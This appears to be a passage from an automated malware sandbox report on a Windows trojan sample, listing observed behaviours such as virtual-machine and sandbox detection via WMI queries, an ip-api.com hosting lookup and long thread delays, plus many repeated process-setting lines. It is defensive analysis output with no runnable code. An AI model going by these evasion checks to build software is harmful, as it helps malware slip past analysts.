                      Source: unknownNetwork traffic detected: HTTP traffic on port 51824 -> 8118
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe PID: 5828, type: MEMORYSTR
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory allocated: 194C4740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory allocated: 194DE230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeWindow / User API: threadDelayed 3948Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeWindow / User API: threadDelayed 3131Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3083Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6455Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -200000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99852s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99733s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -98938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -98813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -98700s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99655s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99541s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99420s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe TID: 5548Thread sleep time: -99281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99852Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99733Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99516Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99406Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 98938Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 98700Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99655Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99541Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99420Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeThread delayed: delay time: 99281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99201Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99092Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98511Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98141Jump to behavior
